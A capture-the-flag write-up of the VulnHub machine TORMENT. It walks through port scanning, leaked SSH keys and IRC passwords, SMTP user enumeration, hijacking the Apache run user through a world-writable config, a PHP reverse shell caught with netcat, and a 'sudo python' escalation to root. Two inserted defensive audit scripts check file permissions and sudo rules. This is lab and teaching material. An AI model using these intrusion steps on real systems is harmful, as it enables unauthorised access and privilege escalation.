26 May 2022

Pentesting Fun Stuff

following the cyber security path…

Digitalworld.local: TORMENT

https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

nmap scan for open ports + services

```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.25
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
2049/tcp open nfs_acl 3 (RPC #100227)
6667/tcp open irc?
6668/tcp open irc?
6669/tcp open irc?
6672/tcp open vision_server?
6674/tcp open unknown
38845/tcp open nlockmgr 1-4 (RPC #100021)
42691/tcp open mountd 1-3 (RPC #100005)
50415/tcp open mountd 1-3 (RPC #100005)
59961/tcp open mountd 1-3 (RPC #100005)
```

The output of the full nmap scan is very large, so only the useful pieces of it are shown here.

```
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
```

Starting with FTP first.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ wget -r ftp://192.168.58.138:21
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ ls -lah
total 4.8M
drwxr-xr-x 11 n0w4n n0w4n 4.0K May 1 16:08 .
drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 16:08 ..
-rw-r--r-- 1 n0w4n n0w4n 110K Dec 28 2018 alternatives.tar.0
-rw-r--r-- 1 n0w4n n0w4n 4.9K Dec 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 n0w4n n0w4n 94K Dec 28 2018 apt.extended_states.0
-rw-r--r-- 1 n0w4n n0w4n 11K Dec 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 n0w4n n0w4n 11K Dec 26 2018 apt.extended_states.2.gz
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .cups
-rw-r--r-- 1 n0w4n n0w4n 559 Dec 23 2018 dpkg.diversions.0
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 n0w4n n0w4n 229 Dec 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 n0w4n n0w4n 505 Dec 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 n0w4n n0w4n 295 Dec 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 n0w4n n0w4n 281 Dec 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 n0w4n n0w4n 208 Dec 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 n0w4n n0w4n 1.7M Jan 1 2019 dpkg.status.0
-rw-r--r-- 1 n0w4n n0w4n 482K Jan 1 2019 dpkg.status.1.gz
-rw-r--r-- 1 n0w4n n0w4n 482K Jan 1 2019 dpkg.status.2.gz
-rw-r--r-- 1 n0w4n n0w4n 481K Dec 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 n0w4n n0w4n 481K Dec 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 n0w4n n0w4n 478K Dec 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 n0w4n n0w4n 460K Dec 27 2018 dpkg.status.6.gz
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ftp
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .imap
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .mysql
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .nfs
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ngircd
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .samba
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .smtp
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .ssh
```

Some interesting findings here:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ cat .ngircd/channels 
channels:
games
tormentedprinter
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138]
└─$ ls -lah .ssh
total 12K
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 16:08 .
drwxr-xr-x 11 n0w4n n0w4n 4.0K May 1 16:08 ..
-rw------- 1 n0w4n n0w4n 1.8K Jan 4 2019 id_rsa
```

For the id_rsa I need a password, so first checking out the irc channel.

I use hexirc to connect to the irc server, but it says I need a password.
From a few google searches I get 2 different findings:
1. the default password is set empty (source: https://www.systutorials.com/docs/linux/man/5-ngircd.conf/)
2. the default password is set to `wealllikedebian` (source: https://git.in-ulm.de/cbiedl/ngircd/raw/master/debian/ngircd.conf)

This password seems to work and I enter the channel `games`.

```
* Now talking on #games
* Topic for #games is: Welcome to the Games Channel!
* Topic for #games set by -Server- (Sat May 1 15:21:29 2021)
```

0 users and no information.

Joining channel `tormentedprinter`

```
* Now talking on #tormentedprinter
* Topic for #tormentedprinter is: If you find that the printers are not printing as they should, you can configure them and check for jammed jobs by logging in with the password "mostmachineshaveasupersecurekeyandalongpassphrase".
* Topic for #tormentedprinter set by -Server- (Sat May 1 15:21:29 2021)
```

A password. But I still lack a username.
Continuing the enumeration.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ gobuster dir -u http://192.168.58.138 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.58.138
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php
[+] Add Slash: true
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/05/01 16:14:11 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/icons/ (Status: 403) [Size: 286] 
/manual/ (Status: 200) [Size: 626] 
/server-status/ (Status: 403) [Size: 294] 

===============================================================
2021/05/01 16:17:25 Finished
===============================================================
```

The webserver didn’t give much info.
Another public facing service nmap did find was CUPS (Common UNIX Printing System).

```
631/tcp open ipp syn-ack ttl 64 CUPS 2.2
| http-methods: 
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Home - CUPS 2.2.1
```

When directing my browser to this service and looking at the `Printers` tab, I get a list of usernames.

```
Queue Name Description Location Make and Model Status
Albert's_Personal_Printer Enterprise Team 1 Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Cherrlt's_Personal_Printer Receptionist's Desk Good Tech Inc, Level 1 Xerox 4045 XES Foomatic/xes (recommended) Idle
David's_Personal_Printer The Director's Personal Printer Good Tech Inc, Level 7 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Edmund's_Personal_Printer For all of Network Infrastructure Good Tech Inc, Level 4 Xerox 4045 XES Foomatic/xes (recommended) Idle
Ethan's_Personal_Printer Enterprise Team 2 Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Eva's_Personal_Printer Personal Printer for Eva Good Tech Inc, Basement 2 Xerox 4045 XES Foomatic/xes (recommended) Idle
Genevieve's_Personal_Printer For all of Legal Good Tech Inc, Level 6 Xerox 4045 XES Foomatic/xes (recommended) Idle
Govindasamy's_Personal_Printer NOT FOR THE INFRA TEAM!! Good Tech Inc, Level 4 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Jessica's_Personal_Printer Receptionist's Desk Good Tech Inc, Level 1 Xerox 4045 XES Foomatic/xes (recommended) Idle
Kenny's_Personal_Printer NOT FOR THE ENTERPRISE TEAM!!! Good Tech Inc, Basement 1 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Patrick's_Personal_Printer Personal Printer for Patrick and Development Department Good Tech Inc, Basement 2 Xerox 4045 XES Foomatic/xes (recommended) Idle
Qinyi's_Personal_Printer Personal Printer for Qinyi Good Tech Inc, Level 3 Xerox WorkCentre PE120 Foomatic/pxlmono Idle
Qiu's_Personal_Printer Personal Printer for Qiu and Procurement Department Good Tech Inc, Level 5 Xerox WorkCentre 7345 Foomatic/pxlcolor (recommended) Idle
Roland's_Personal_Printer For Roland's Own Use Good Tech Inc, Level 4 Apple LaserWriter Select 360 Foomatic/Postscript (recommended) Idle
Sara's_Personal_Printer Personal Printer for Sara Good Tech Inc, Level 5 Xerox WorkCentre 7345 Foomatic/pxlcolor (recommended) Idle
```

Creating a list

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ curl -s http://192.168.58.138:631/printers/ | grep Personal | cut -d/ -f3 | cut -d'&' -f1 > usernames
```

For the enumeration of the smtp server, I use a python script (https://github.com/tommelo/smtpenum)

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ ./smtpenum.py -t 192.168.58.138 -l usernames

_____ __ __ _______ _____ ______ _ _ _ _ __ __
/ ____| \/ |__ __| __ \ | ____| \ | | | | | \/ |
| (___ | \ / | | | | |__) | | |__ | \| | | | | \ / |
\___ \| |\/| | | | | ___/ | __| | . ` | | | | |\/| |
____) | | | | | | | | | |____| |\ | |__| | | | |
|_____/|_| |_| |_| |_| |______|_| \_|\____/|_| |_|

[mr.church] - v1.0.0

[+] Trying to resolve host by name
[+] 192.168.58.138 has address: 192.168.58.138
[+] SMTP port is openned!
[+] Grabbing SMTP Banner...
[+] 220 TORMENT.localdomain ESMTP Postfix (Debian/GNU)

[+] Trying to enumerate users...
[+] Accepted: Patrick
[+] Accepted: Qiu
```

Then I combine these names with the found password to see if I can log in with ssh.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment/192.168.58.138/.ssh]
└─$ ssh -i id_rsa patrick@192.168.58.138
Enter passphrase for key 'id_rsa': 
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 4 19:34:43 2019 from 192.168.254.139
patrick@TORMENT:~$ 
```
```
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on TORMENT:
(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
```
```
patrick@TORMENT:~$ cat /etc/passwd | grep -e '100.*'
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
qiu:x:1000:1000:qiu,,,:/home/qiu:/bin/bash
patrick:x:1001:1001:,,,:/home/patrick:/bin/bash
```
```
patrick@TORMENT:~$ find / -iname "*.conf" -type f -perm -o+w -exec ls -ld {} \; 2>/dev/null
-rwxrwxrwx 1 root root 7224 Nov 4 2018 /etc/apache2/apache2.conf
```

That’s off. Normally this file is writable only by root and read-only for everyone else.
This can be used to our advantage, but there is another piece of the puzzle I need to check.

```
patrick@TORMENT:~$ ls -ld /var/www/html
drwxrwxrwx 2 www-data www-data 4096 Jan 1 2019 /var/www/html
```

Right. So this is also not very good to have, because anyone can drop a php file with a malicious payload in the root folder of the webserver. Now to combine these two findings.
First changing the apache config file and adding a new default user. User qiu in this case, because I already have access to user patrick.

```
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
User qiu
Group qiu
```
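From the defender's side, both permission problems and the overridden run user can be caught with a short audit. This is an added example, not part of the original write-up; the sample tree is constructed, and the check assumes the last `User` directive in the file is the one that takes effect.

```shell
# Added example: constructed sample tree, not the target's real filesystem.

# List world-writable regular files, plus world-writable directories that
# lack the sticky bit, under the given roots. Symlinks are not matched.
audit_world_writable() {
    find "$@" \( -type f -perm -0002 -print \) -o \
        \( -type d -perm -0002 ! -perm -1000 -print \) 2>/dev/null | sort
}

# Print the account named by the last "User" directive in an Apache config.
# Assumption: the last directive in the file takes effect, which is what the
# walkthrough relies on. Include files are not followed.
effective_apache_user() {
    awk 'tolower($1) == "user" { u = $2 } END { print u }' "$1"
}

# Build a constructed tree that mirrors the two findings on the box.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/etc/apache2" "$root/var/www/html" "$root/tmp"
    printf '%s\n' 'User ${APACHE_RUN_USER}' 'Group ${APACHE_RUN_GROUP}' \
        'User qiu' 'Group qiu' > "$root/etc/apache2/apache2.conf"
    printf 'Listen 80\n' > "$root/etc/apache2/ports.conf"
    chmod 777 "$root/etc/apache2/apache2.conf" "$root/var/www/html"
    chmod 644 "$root/etc/apache2/ports.conf"
    chmod 1777 "$root/tmp"    # sticky bit set, like a real /tmp: not reported
    printf '%s\n' "$root"
}

# Clear the world-writable bit on everything the audit reports.
harden() {
    audit_world_writable "$@" | while IFS= read -r path; do
        chmod o-w "$path"
    done
}

tree=$(make_sample_tree)
echo "findings before:"; audit_world_writable "$tree"
echo "apache run user: $(effective_apache_user "$tree/etc/apache2/apache2.conf")"
harden "$tree"
echo "findings after: $(audit_world_writable "$tree" | wc -l)"
rm -rf "$tree"
```

On a real host the roots would be `/etc` and the web root, and a run user other than the packaged service account is the signal to investigate.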

Now to transfer a php reverse shell to the remote machine using the known ssh credentials.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ scp -i 192.168.58.138/.ssh/id_rsa shell.php patrick@192.168.58.138:/var/www/html/
Enter passphrase for key '192.168.58.138/.ssh/id_rsa': 
shell.php
```

Setting up a listener and rebooting the remote machine.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ sudo nc -lvp 9998
listening on [any] 9998 ...
```
```
patrick@TORMENT:~$ sudo systemctl reboot
```

After rebooting, access the shell.php file with the web browser.
And we have a reverse shell to user qiu.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/torment]
└─$ sudo nc -lvp 9998
listening on [any] 9998 ...
192.168.58.138: inverse host lookup failed: Unknown host
connect to [192.168.58.128] from (UNKNOWN) [192.168.58.138] 49682
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
01:55:40 up 1 min, 0 users, load average: 0.12, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
/bin/sh: 0: can't access tty; job control turned off
$
```
```
$ python -c 'import pty;pty.spawn("/bin/bash");'
qiu@TORMENT:/$
```
```
qiu@TORMENT:/$ sudo -l
sudo -l
Matching Defaults entries for qiu on TORMENT:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiu may run the following commands on TORMENT:
(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
```

If the python binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```
qiu@TORMENT:/$ sudo python -c 'import os; os.system("/bin/sh")'
sudo python -c 'import os; os.system("/bin/sh")'
# id
id
uid=0(root) gid=0(root) groups=0(root)
```
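The sudo rules that made this last step possible can be flagged during a review of `sudo -l` output. This is an added example, not part of the original write-up; the function name and the short interpreter list are assumptions, and the sample rule lines are copied from the two outputs above.

```shell
# Added example: flag sudo rules like the ones above from `sudo -l` output.
# The interpreter list is an assumption and deliberately short; rule lines
# that wrap onto a second line are not handled.
risky_sudo_entries() {
    awk '
    /may run the following commands/ { rules = 1; next }
    rules && /NOPASSWD:/ {
        sub(/^.*NOPASSWD:[ \t]*/, "")
        n = split($0, cmds, /,[ \t]*/)
        for (i = 1; i <= n; i++) {
            sub(/[ \t]+$/, "", cmds[i])
            nargs = split(cmds[i], words, /[ \t]+/)
            nb = split(words[1], parts, "/")
            base = parts[nb]
            if (base ~ /^(python[0-9.]*|perl|ruby|bash|dash|sh)$/)
                print words[1] "\tinterpreter: runs arbitrary code as the sudo target user"
            else if (base == "systemctl" && nargs == 1)
                print words[1] "\tsystemctl without a fixed subcommand"
        }
    }'
}

# Rule lines copied from the two `sudo -l` outputs in the write-up.
sample_patrick() {
    cat <<'EOF'
User patrick may run the following commands on TORMENT:
(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
EOF
}

sample_qiu() {
    cat <<'EOF'
User qiu may run the following commands on TORMENT:
(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
EOF
}

echo "patrick:"; sample_patrick | risky_sudo_entries
echo "qiu:";     sample_qiu | risky_sudo_entries
```

Patrick's rule pins each `systemctl` call to one fixed subcommand, so nothing is reported for it; both of qiu's entries are flagged.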

And for the final part.

```
# cat /root/proof.txt
cat /root/proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)

Until then, try harder!
```
